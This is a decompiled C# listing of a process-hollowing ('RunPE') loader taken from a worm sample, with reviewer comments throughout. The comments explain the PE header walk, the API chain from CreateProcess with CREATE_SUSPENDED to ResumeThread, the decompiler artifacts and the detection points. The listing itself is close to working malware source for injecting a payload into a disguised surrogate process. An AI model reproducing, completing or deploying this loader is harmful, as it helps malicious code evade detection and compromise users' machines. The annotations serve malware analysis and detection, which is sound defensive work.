// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.sadioasudoixzcuoisaudoixuzcoixuzcsad
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
//
// NOTE(review): decompiled malware sample retained for analysis; it is not code to build on or
// "fix". The decompiler emitted locals that are read before assignment (num1, bufr, num6), which
// C# rejects (CS0165); the original was presumably VB.NET (checked arithmetic, the
// DebuggerNonUserCode constructors, the "- 1 + 1" array-size idiom), where those locals default
// to zero / IntPtr.Zero. Read the listing as a behavioural description, not as compilable source.

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security;
using System.Text;

namespace ajhfsdlhjasnagfgewfwsg
{
  /// <summary>
  /// Process-hollowing ("RunPE") loader. Starts a surrogate process suspended, unmaps the
  /// surrogate's own image, copies a caller-supplied PE image into the surrogate's address
  /// space, redirects the primary thread to the payload's entry point and resumes it, so the
  /// payload runs under the surrogate's name, path and PID. The obfuscated class and namespace
  /// names carry no meaning.
  /// </summary>
  public class sadioasudoixzcuoisaudoixuzcoixuzcsad
  {
    // Section-characteristics -> page-protection table. The index is the top three bits of
    // IMAGE_SECTION_HEADER.Characteristics (bit0 = IMAGE_SCN_MEM_EXECUTE 0x20000000,
    // bit1 = IMAGE_SCN_MEM_READ 0x40000000, bit2 = IMAGE_SCN_MEM_WRITE 0x80000000); the values
    // are Win32 PAGE_* constants:
    //   0 (---) -> 0x01 PAGE_NOACCESS        4 (W--) -> 0x04 PAGE_READWRITE
    //   1 (X--) -> 0x10 PAGE_EXECUTE         5 (WX-) -> 0x40 PAGE_EXECUTE_READWRITE
    //   2 (R--) -> 0x02 PAGE_READONLY        6 (RW-) -> 0x04 PAGE_READWRITE
    //   3 (RX-) -> 0x20 PAGE_EXECUTE_READ    7 (RWX) -> 0x40 PAGE_EXECUTE_READWRITE
    private static readonly int[] prot = new int[8]
    {
      1, 16, 2, 32, 4, 64, 4, 64
    };

    [DebuggerNonUserCode]
    public sadioasudoixzcuoisaudoixuzcoixuzcsad()
    {
    }

    /// <summary>
    /// Hollows a newly created surrogate process and runs <paramref name="bytes"/> inside it.
    /// </summary>
    /// <param name="bytes">A complete PE32 file image (headers plus raw sections). Nothing is
    /// validated: no "MZ"/"PE" signature check, no bounds check on any header-derived offset
    /// (a malformed image surfaces as ArgumentException / IndexOutOfRangeException from
    /// BitConverter or Buffer.BlockCopy, or OverflowException from the checked arithmetic), and
    /// no bitness check. Every address is narrowed with <c>ToInt32</c> and the thread context
    /// buffer is the 716-byte x86 CONTEXT, so only a 32-bit payload in a 32-bit host is handled.</param>
    /// <param name="surrogateProcess">Passed to CreateProcess as <c>lpCommandLine</c> with
    /// <c>lpApplicationName</c> null, i.e. the command line of the process whose identity the
    /// payload borrows. This is the only caller-controlled input besides the image itself.</param>
    /// <remarks>
    /// Failure handling is almost absent: only CreateProcess, GetThreadContext, ReadProcessMemory
    /// and NtUnmapViewOfSection gate anything; the results of VirtualAllocEx, every
    /// WriteProcessMemory, VirtualProtectEx and SetThreadContext are ignored, and
    /// <see cref="Win32.ResumeThread"/> runs unconditionally at the end, so a partially hollowed
    /// or completely untouched surrogate is resumed either way. The process and thread handles in
    /// <c>pInfo</c> are never closed. The API sequence — CreateProcess(CREATE_SUSPENDED) ->
    /// GetThreadContext -> ReadProcessMemory(PEB) -> NtUnmapViewOfSection -> VirtualAllocEx(RWX)
    /// -> WriteProcessMemory -> VirtualProtectEx -> SetThreadContext -> ResumeThread — is the
    /// canonical hollowing chain that endpoint detection rules key on.
    /// </remarks>
    public static void RunPE(byte[] bytes, string surrogateProcess)
    {
      // PE header walk. All offsets below are relative to e_lfanew (bytes[60], the DOS header's
      // pointer to the "PE\0\0" signature):
      //   +6   IMAGE_FILE_HEADER.NumberOfSections
      //   +84  IMAGE_OPTIONAL_HEADER32.SizeOfHeaders (how many leading bytes are copied verbatim)
      int int32 = BitConverter.ToInt32(bytes, 60);
      int int16 = (int) BitConverter.ToInt16(bytes, checked (int32 + 6));
      IntPtr size1 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 84)));
      // STARTUPINFO (68 bytes, all zero — cb is never set) and PROCESS_INFORMATION as raw
      // buffers; after the call pInfo[0] = hProcess, pInfo[1] = hThread.
      byte[] sInfo = new byte[68];
      IntPtr[] pInfo = new IntPtr[4];
      // Decompiler artifact: never assigned in this listing; presumably IntPtr.Zero (null
      // security attributes / environment) in the original build.
      IntPtr num1;
      // dwCreationFlags 4 == CREATE_SUSPENDED: the surrogate is created but its primary thread
      // never gets to execute the surrogate's own image. On failure the routine silently returns.
      if (!sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.CreateProcess((string) null, new StringBuilder(surrogateProcess), num1, num1, false, 4, num1, (string) null, sInfo, pInfo))
        return;
      // x86 CONTEXT is 716 bytes == 179 DWORDs. ctxt[0] is ContextFlags = 0x10002
      // (CONTEXT_i386 | CONTEXT_INTEGER), so the integer registers (Eax..Edi) are captured by
      // GetThreadContext and written back by SetThreadContext.
      uint[] ctxt = new uint[179];
      ctxt[0] = 65538U;
      // Both read before assignment in this listing (decompiler artifact, see header note).
      IntPtr bufr;
      IntPtr numRead;
      // ctxt[41] (byte offset 164) is Ebx in the x86 CONTEXT layout. NOTE(review): the code
      // relies on the conventional RunPE assumption that Ebx of a just-created suspended x86
      // process points at the PEB, so PEB+8 is PEB.ImageBaseAddress; that convention is not
      // verifiable from this listing. Four bytes are read into an IntPtr (only correct in a
      // 32-bit host), then the surrogate's original image is unmapped at that base.
      // NtUnmapViewOfSection == 0 is STATUS_SUCCESS.
      if (sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.GetThreadContext(pInfo[1], ctxt) && sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.ReadProcessMemory(pInfo[0], new IntPtr(checked ((long) ctxt[41] + 8L)), ref bufr, new IntPtr(4), ref numRead) && sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.NtUnmapViewOfSection(pInfo[0], bufr) == 0U)
      {
        // Reserve+commit (0x3000 == MEM_COMMIT | MEM_RESERVE) SizeOfImage (e_lfanew+80) bytes at
        // the payload's own ImageBase (e_lfanew+52) as PAGE_EXECUTE_READWRITE (64). There is no
        // relocation processing anywhere in this routine, so the payload must be loadable at its
        // preferred base; the return value is not checked, so if the allocation fails every
        // write below targets IntPtr.Zero + offset.
        IntPtr hProc1 = pInfo[0];
        IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 52)));
        IntPtr addr1 = num2;
        IntPtr num3 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 80)));
        IntPtr size2 = num3;
        IntPtr baseAddr1 = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.VirtualAllocEx(hProc1, addr1, size2, 12288, 64);
        // Copy the headers: the first SizeOfHeaders bytes of the file go to the new base
        // unchanged. `flag` is assigned here and below but never tested.
        bool flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.WriteProcessMemory(pInfo[0], baseAddr1, bytes, size1, ref numRead);
        // Map each section. The section table starts at e_lfanew+248 (PE32: 4-byte signature +
        // 20-byte file header + 224-byte optional header) and entries are 40 bytes apart. Each
        // IMAGE_SECTION_HEADER is read as ten DWORDs: [2] VirtualSize, [3] VirtualAddress,
        // [4] SizeOfRawData, [5] PointerToRawData, [9] Characteristics.
        int num4 = checked (int16 - 1);
        int num5 = 0;
        while (num5 <= num4)
        {
          int[] dst1 = new int[10];
          Buffer.BlockCopy((Array) bytes, checked (int32 + 248 + num5 * 40), (Array) dst1, 0, 40);
          // Raw section bytes lifted from the file at PointerToRawData; "- 1 + 1" is the VB
          // "0 To N-1" array-bound idiom. Neither PointerToRawData nor SizeOfRawData is checked
          // against bytes.Length — BlockCopy throws on a malformed header.
          byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)];
          Buffer.BlockCopy((Array) bytes, dst1[5], (Array) dst2, 0, dst2.Length);
          // Write the raw data at new base + VirtualAddress.
          IntPtr hProc2 = pInfo[0];
          num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
          IntPtr baseAddr2 = num3;
          byte[] buff = dst2;
          num2 = new IntPtr(dst2.Length);
          IntPtr size3 = num2;
          ref IntPtr local1 = ref numRead;
          flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.WriteProcessMemory(hProc2, baseAddr2, buff, size3, ref local1);
          // Then apply the section's protection over VirtualSize bytes at the same address.
          // `>>` binds tighter than `&`, so the index is (Characteristics >> 29) & 7; the
          // arithmetic shift's sign bits are masked off by & 7. num6 receives lpflOldProtect
          // and is discarded.
          IntPtr hProc3 = pInfo[0];
          num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
          IntPtr addr2 = num3;
          num2 = new IntPtr(dst1[2]);
          IntPtr size4 = num2;
          int newProt = sadioasudoixzcuoisaudoixuzcoixuzcsad.prot[dst1[9] >> 29 & 7];
          int num6;
          ref int local2 = ref num6;
          flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.VirtualProtectEx(hProc3, addr2, size4, newProt, ref local2);
          checked { ++num5; }
        }
        // Overwrite PEB.ImageBaseAddress (same Ebx+8 location read above) with the new base so
        // the loader and any code consulting the PEB see the payload as the process image.
        IntPtr hProc4 = pInfo[0];
        num3 = new IntPtr(checked ((long) ctxt[41] + 8L));
        IntPtr baseAddr3 = num3;
        byte[] bytes1 = BitConverter.GetBytes(baseAddr1.ToInt32());
        num2 = new IntPtr(4);
        IntPtr size5 = num2;
        ref IntPtr local = ref numRead;
        flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.WriteProcessMemory(hProc4, baseAddr3, bytes1, size5, ref local);
        // ctxt[44] (byte offset 176) is Eax. It is set to new base + AddressOfEntryPoint
        // (e_lfanew+40). NOTE(review): this relies on the conventional RunPE assumption that a
        // suspended new x86 thread's Eax holds the start address that the thread-start stub
        // jumps to; the listing itself does not show that. Note the entry-point read is the only
        // header access here that is not wrapped in checked().
        ctxt[44] = checked ((uint) (baseAddr1.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40)));
        sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.SetThreadContext(pInfo[1], ctxt);
      }
      // Resumed unconditionally: also when the hollowing branch was skipped (the surrogate then
      // simply runs as itself) or when any unchecked write above failed.
      sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.ResumeThread(pInfo[1]);
    }

    // P/Invoke surface. None of the imports sets SetLastError = true, so no call site can
    // retrieve a Win32 error code; SuppressUnmanagedCodeSecurity removes the CAS stack walk on
    // each unmanaged call. Struct arguments (STARTUPINFO, PROCESS_INFORMATION, CONTEXT) are
    // modelled as flat byte/IntPtr/uint arrays rather than marshalled structs.
    [SuppressUnmanagedCodeSecurity]
    private class Win32
    {
      [DebuggerNonUserCode]
      public Win32()
      {
      }

      // kernel32!CreateProcess (ANSI/Unicode variant not specified; default marshalling applies).
      // sInfo stands in for STARTUPINFO, pInfo for PROCESS_INFORMATION.
      [DllImport("kernel32")]
      [return: MarshalAs(UnmanagedType.Bool)]
      public static extern bool CreateProcess(
        string appName,
        StringBuilder commandLine,
        IntPtr procAttr,
        IntPtr thrAttr,
        [MarshalAs(UnmanagedType.Bool)] bool inherit,
        int creation,
        IntPtr env,
        string curDir,
        byte[] sInfo,
        IntPtr[] pInfo);

      // ctxt is a raw CONTEXT buffer; the caller sizes it for x86 (179 DWORDs).
      [DllImport("kernel32")]
      [return: MarshalAs(UnmanagedType.Bool)]
      public static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);

      // Native API (ntdll); returns NTSTATUS, 0 == STATUS_SUCCESS.
      [DllImport("ntdll")]
      public static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);

      // The destination buffer is a single IntPtr passed by ref; callers must keep bufrSize <=
      // sizeof(IntPtr) (the one caller passes 4).
      [DllImport("kernel32")]
      [return: MarshalAs(UnmanagedType.Bool)]
      public static extern bool ReadProcessMemory(
        IntPtr hProc,
        IntPtr baseAddr,
        ref IntPtr bufr,
        IntPtr bufrSize,
        ref IntPtr numRead);

      // Returns the previous suspend count, or -1 on failure (ignored by the caller).
      [DllImport("kernel32")]
      public static extern int ResumeThread(IntPtr hThr);

      [DllImport("kernel32")]
      [return: MarshalAs(UnmanagedType.Bool)]
      public static extern bool SetThreadContext(IntPtr hThr, uint[] ctxt);

      // Returns the allocated base, or IntPtr.Zero on failure (ignored by the caller).
      [DllImport("kernel32")]
      public static extern IntPtr VirtualAllocEx(
        IntPtr hProc,
        IntPtr addr,
        IntPtr size,
        int allocType,
        int prot);

      [DllImport("kernel32")]
      [return: MarshalAs(UnmanagedType.Bool)]
      public static extern bool VirtualProtectEx(
        IntPtr hProc,
        IntPtr addr,
        IntPtr size,
        int newProt,
        ref int oldProt);

      [DllImport("kernel32")]
      [return: MarshalAs(UnmanagedType.Bool)]
      public static extern bool WriteProcessMemory(
        IntPtr hProc,
        IntPtr baseAddr,
        byte[] buff,
        IntPtr size,
        ref IntPtr numRead);
    }
  }
}